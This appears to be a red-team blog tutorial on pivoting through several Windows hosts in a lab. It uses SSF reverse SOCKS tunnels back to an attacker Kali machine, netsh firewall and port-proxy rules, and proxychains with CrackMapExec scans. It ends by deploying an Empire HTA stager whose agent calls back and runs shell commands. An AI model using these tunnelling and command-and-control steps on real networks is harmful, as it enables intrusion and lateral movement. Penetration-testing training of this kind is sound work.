Solving double/n hop with ssf - SOCKS/C2

My solution to solve multiple hop using SSF. First we start with three servers, imagine we want to reach the Server 3 (192.168.152.102) from our Kali (192.168.133.156). We need to setup a socks tunnel between Server 2 and our kali. We also want to execute an Empire agent on Server 2. Let's solve this situation !


Note: You need to have local administrator privilege on Server 1 in order to allow connection on port 5000 if the firewall is enabled !

Creating a remote SOCKS between Server 1 and Kali


First we start an 'ssf' server on Kali:

    ┌──(mpgn㉿kali)-[~/ssf-linux-x86_64-3.0.0]
    └─$ sudo ./ssfd -p 1337
    [2021-03-02T08:12:02-05:00] [info] [config] [tls] CA cert path: 
    [2021-03-02T08:12:02-05:00] [info] [config] [tls] cert path: 
    [2021-03-02T08:12:02-05:00] [info] [config] [tls] key path: 
    [2021-03-02T08:12:02-05:00] [info] [config] [tls] key password: <>
    [2021-03-02T08:12:02-05:00] [info] [config] [tls] dh path: 
    [2021-03-02T08:12:02-05:00] [info] [config] [tls] cipher suite: 
    [2021-03-02T08:12:02-05:00] [info] [config] [http proxy] 
    [2021-03-02T08:12:02-05:00] [info] [config] [socks proxy] 
    [2021-03-02T08:12:02-05:00] [info] [config] [circuit] 
    [2021-03-02T08:12:02-05:00] [info] [ssfd] listening on <*:1337>
    [2021-03-02T08:12:02-05:00] [info] [ssfd] running (Ctrl + C to stop)
    

On Server 1 we use ssf to open a remote socks and connect it to our ssfd server (on kali). We use the option -F port to open a remote socks.

    C:\Users\harry\Desktop\ssf-win-x86_64-3.0.0\ssf-win-x86_64-3.0.0>.\ssf.exe -F 1080 -p 1337 192.168.133.156
    [2021-02-28T12:37:19-08:00] [info] [config] [tls] CA cert path: 
    [2021-02-28T12:37:19-08:00] [info] [config] [tls] cert path: 
    [2021-02-28T12:37:19-08:00] [info] [config] [tls] key path: 
    [2021-02-28T12:37:19-08:00] [info] [config] [tls] key password: <>
    [2021-02-28T12:37:19-08:00] [info] [config] [tls] dh path: 
    [2021-02-28T12:37:19-08:00] [info] [config] [tls] cipher suite: 
    [2021-02-28T12:37:19-08:00] [info] [config] [http proxy] 
    [2021-02-28T12:37:19-08:00] [info] [config] [socks proxy] 
    [2021-02-28T12:37:19-08:00] [info] [config] [circuit] 
    [2021-02-28T12:37:19-08:00] [info] [ssf] connecting to <192.168.133.156:443>
    [2021-02-28T12:37:19-08:00] [info] [ssf] running (Ctrl + C to stop)
    [2021-02-28T12:37:19-08:00] [info] [client] connection attempt 1/1
    [2021-02-28T12:37:19-08:00] [info] [client] connected to server
    [2021-02-28T12:37:19-08:00] [info] [client] running
    [2021-02-28T12:37:19-08:00] [info] [microservice] [socks]: start server on fiber port 1080
    [2021-02-28T12:37:19-08:00] [info] [client] service  OK

On our Kali, a line should appear on the server ssfd:

    [2021-03-02T08:12:14-05:00] [info] [microservice] [stream_listener]: forward TCP connections from <127.0.0.1:1080> to 1080

Now using proxychains we can configure the socks proxy like this:

    vim /etc/proxychains.conf
    
    ...
    [ProxyList]
    # add proxy here ...
    # meanwile
    # defaults set to "tor"
    socks5 127.0.0.1 1080 

And then we can use CrackMapExec to scan to Server 2

    ┌──(mpgn㉿kali)-[~]
    └─$ proxychains crackmapexec smb 192.168.151.102
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.151.102:445  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.151.102:445  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.151.102:135  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.151.102:445  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.151.102:445  ...  OK
    SMB         192.168.151.102 445    DESKTOP-BQC6FMA  [*] Windows 10.0 Build 19041 x64 (name:DESKTOP-BQC6FMA) (domain:poudlard.wizard) (signing:False) (SMBv1:False)
    

Note: No need to be local admin for this part of course.

Creating a remote SOCKS between Server 2 and Kali


Now let's open a socks between Server 2 and our Kali. First we open a ssf server on port 5000 on Server 1:

    C:\Users\harry\Desktop\ssf-win-x86_64-3.0.0\ssf-win-x86_64-3.0.0>.\ssfd.exe -p 5000
    [2021-03-02T02:23:25-08:00] [info] [config] [tls] CA cert path: 
    [2021-03-02T02:23:25-08:00] [info] [config] [tls] cert path: 
    [2021-03-02T02:23:25-08:00] [info] [config] [tls] key path: 
    [2021-03-02T02:23:25-08:00] [info] [config] [tls] key password: <>
    [2021-03-02T02:23:25-08:00] [info] [config] [tls] dh path: 
    [2021-03-02T02:23:25-08:00] [info] [config] [tls] cipher suite: 
    [2021-03-02T02:23:25-08:00] [info] [config] [http proxy] 
    [2021-03-02T02:23:25-08:00] [info] [config] [socks proxy] 
    [2021-03-02T02:23:25-08:00] [info] [config] [circuit] 
    [2021-03-02T02:23:25-08:00] [info] [ssfd] listening on <*:5000>
    [2021-03-02T02:23:25-08:00] [info] [ssfd] running (Ctrl + C to stop)
    

And then you need to allow connection to the port 5000 by adding this firewall rules if the firewall is enabled.

    C:\Windows\system32>netsh advfirewall firewall add rule name="TCP Port 5000" dir=in action=allow protocol=TCP localport=5000
        Ok.
    

You can argue on the fact that we can simple use the netsh command and port forward the port 1338 from Server 1 to our Kali, while this this true, you will always need administrative privileges even if the firewall is disabled. In our case, if the firewall is disabled we don't need administrative privileges anymore which can avoid to spend time to privesc on Server 1.
In any case, I'm currently using both option regarding the situation, so you can also use the following command netsh interface portproxy add v4tov4 listenport=1338 listenaddress=0.0.0.0 connectport=1338 connectaddress=192.168.133.156 and just reproduce the step 1 on Server 2.

Then we need to configure a path to tell ssf on Server 2 to use the port 5000 on Server 1 to connect to our Kali since our Kali is only reachable from Server 1. It's actually very simple, just add the following code in a file.

    C:\Users\harry\Desktop\ssf-win-x86_64-3.0.0\ssf-win-x86_64-3.0.0>type config.txt
    {
        "ssf": {
            "circuit": [
            {"host": "192.168.151.101", "port":"5000"}
            ]
        }
    }
    C:\Users\harry\Desktop\ssf-win-x86_64-3.0.0\ssf-win-x86_64-3.0.0>.\ssf.exe -F 1081 -c config.txt -p 1338 192.168.133.156
    [2021-03-02T06:08:04-08:00] [info] [config] loading file 
    [2021-03-02T06:08:04-08:00] [info] [config] [tls] CA cert path: 
    [2021-03-02T06:08:04-08:00] [info] [config] [tls] cert path: 
    [2021-03-02T06:08:04-08:00] [info] [config] [tls] key path: 
    [2021-03-02T06:08:04-08:00] [info] [config] [tls] key password: <>
    [2021-03-02T06:08:04-08:00] [info] [config] [tls] dh path: 
    [2021-03-02T06:08:04-08:00] [info] [config] [tls] cipher suite: 
    [2021-03-02T06:08:04-08:00] [info] [config] [http proxy] 
    [2021-03-02T06:08:04-08:00] [info] [config] [socks proxy] 
    [2021-03-02T06:08:04-08:00] [info] [config] [circuit] 1. <192.168.151.101:5000>
    [2021-03-02T06:08:04-08:00] [info] [ssf] connecting to <192.168.133.156:1338>
    [2021-03-02T06:08:04-08:00] [info] [ssf] running (Ctrl + C to stop)
    [2021-03-02T06:08:04-08:00] [info] [client] connection attempt 1/1
    [2021-03-02T06:08:04-08:00] [info] [client] connected to server
    [2021-03-02T06:08:04-08:00] [info] [client] running
    

With the netsh solution just run .\ssf.exe -L 4443:192.168.133.156:4443 -p 1338 192.168.151.101 -F 1081

On our kali we should see this new line pop:

    [2021-03-02T09:11:58-05:00] [info] [microservice] [stream_listener]: forward TCP connections from <127.0.0.1:1081> to 1081

Now copy the proxychains conf and modify it with port 1081 then we can target Server 3 without any problem using the proxy socks !

    ┌──(mpgn㉿kali)-[~]
    └─$  copy /etc/proxychains.conf /tmp/proxychains-152.conf
    ┌──(mpgn㉿kali)-[~]
    └─$ vim /tmp/proxychains-152.conf
        
        ...
        [ProxyList]
        # add proxy here ...
        # meanwile
        # defaults set to "tor"
        socks5 127.0.0.1 1081
    
    ┌──(mpgn㉿kali)-[~]
    └─$ proxychains -f /tmp/proxychains-152.conf  crackmapexec smb 192.168.152.102
    [proxychains] config file found: /tmp/proxychains-152.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    [proxychains] Strict chain  ...  127.0.0.1:1081  ...  192.168.152.102:445  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1081  ...  192.168.152.102:445  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1081  ...  192.168.152.102:135  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1081  ...  192.168.152.102:445  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1081  ...  192.168.152.102:445  ...  OK
    SMB         192.168.152.102 445    MSEDGEWIN10      [*] Windows 10.0 Build 17763 x64 (name:MSEDGEWIN10) (domain:MSEDGEWIN10) (signing:False) (SMBv1:False)
    

Note: We could have close the first ssf connection made on first step (Server 1 to Kali).

Executing our Empire agent on Server 2


Now if you want to get your Empire agent running on Server 2 you need to create a new listener (notice the host 127.0.0.1)

    (Empire: listeners) > uselistener http
    (Empire: listeners/http) > info
    
    HTTP[S] Options:
    
      Name              Required    Value                            Description
      ----              --------    -------                          -----------
      Name              True        http1                            Name for the listener.
      Host              True        http://127.0.0.1:4443            Hostname/IP for staging.
      BindIP            True        0.0.0.0                          The IP to bind to on the control server.
      Port              True        4443                             Port for the listener.
    .....
    

Then generate an agent ready to use on Empire and set the Listener to the previous one you created:

    (Empire: agents) > usestager windows/hta
    (Empire: stager/windows/hta) > info
    
    Name: HTA
    
    Description:
        Generates an HTA (HyperText Application) For
        Internet Explorer
    
    Options:
    
        Name             Required    Value             Description
        ----             --------    -------           -----------
        Listener         True        http1             Listener to generate stager for.
        Language         True        powershell        Language of the stager to generate.
    

Before executing our agent we need to kill our previous ssf connection on Server 2 and add some options to enable port forwarding

C:\Users\harry\Desktop\ssf-win-x86_64-3.0.0\ssf-win-x86_64-3.0.0>.\ssf.exe -c config.txt -L 4443:192.168.133.156:4443 -p 1338 192.168.133.156 -F 1081
    [2021-03-02T06:36:22-08:00] [info] [config] loading file 
    [2021-03-02T06:36:22-08:00] [info] [config] [tls] CA cert path: 
    [2021-03-02T06:36:22-08:00] [info] [config] [tls] cert path: 
    [2021-03-02T06:36:22-08:00] [info] [config] [tls] key path: 
    [2021-03-02T06:36:22-08:00] [info] [config] [tls] key password: <>
    [2021-03-02T06:36:22-08:00] [info] [config] [tls] dh path: 
    [2021-03-02T06:36:22-08:00] [info] [config] [tls] cipher suite: 
    [2021-03-02T06:36:22-08:00] [info] [config] [http proxy] 
    [2021-03-02T06:36:22-08:00] [info] [config] [socks proxy] 
    [2021-03-02T06:36:22-08:00] [info] [config] [circuit] 1. <192.168.151.101:5000>
    [2021-03-02T06:36:22-08:00] [info] [ssf] connecting to <192.168.133.156:1338>
    [2021-03-02T06:36:22-08:00] [info] [ssf] running (Ctrl + C to stop)
    [2021-03-02T06:36:22-08:00] [info] [client] connection attempt 1/1
    [2021-03-02T06:36:22-08:00] [info] [client] connected to server
    [2021-03-02T06:36:22-08:00] [info] [client] running
    [2021-03-02T06:36:22-08:00] [info] [microservice] [socks]: start server on fiber port 1081
    [2021-03-02T06:36:22-08:00] [info] [client] service  OK
    [2021-03-02T06:36:22-08:00] [info] [microservice] [stream_listener]: forward TCP connections from <127.0.0.1:4443> to 4443
    [2021-03-02T06:36:22-08:00] [info] [client] service  OK    
    

Now just run your stager on Server 2 and you should see the agent pop in Empire

    [*] Sending POWERSHELL stager (stage 1) to 192.168.133.156                                                                                                   
    [*] New agent D816BHAY checked in
    [+] Initial agent D816BHAY from 192.168.133.156 now active (Slack)
    [*] Sending agent (stage 2) to D816BHAY at 192.168.133.156
    
    (Empire: stager/windows/hta) > interact D816BHAY
    (Empire: D816BHAY) > shell whoami
    [*] Tasked D816BHAY to run TASK_SHELL
    [*] Agent D816BHAY tasked with task ID 1
    (Empire: D816BHAY) > 
    poudlard\harry
    
    ..Command execution completed.
    
    (Empire: D816BHAY) > shell ipconfig
    [*] Tasked D816BHAY to run TASK_SHELL
    [*] Agent D816BHAY tasked with task ID 2
    (Empire: D816BHAY) > 
    Windows IP Configuration
    
    
    Ethernet adapter Ethernet0:
    
        Connection-specific DNS Suffix  . : 
        IPv4 Address. . . . . . . . . . . : 192.168.151.102
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.151.100
    
    Ethernet adapter Ethernet1:
    
        Connection-specific DNS Suffix  . : 
        IPv4 Address. . . . . . . . . . . : 192.168.152.101
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.152.100
    
    ..Command execution completed.
    
    (Empire: D816BHAY) > 
    

Creating a remote SOCKS between server n and Kali

On each servers you need to run the command ssfd.exe -p 5000, you also need to open the port 5000 on the firewall to allow the connection meaning you need administrative privileges.

Then modify the config.txt file regarding your path, example if we want to setup a socks on Server 3, the config look like this:

{
    "ssf": {
        "circuit": [
            {"host": "192.168.152.101", "port":"5000"},
            {"host": "192.168.151.101", "port":"5000"}
        ]
    }
}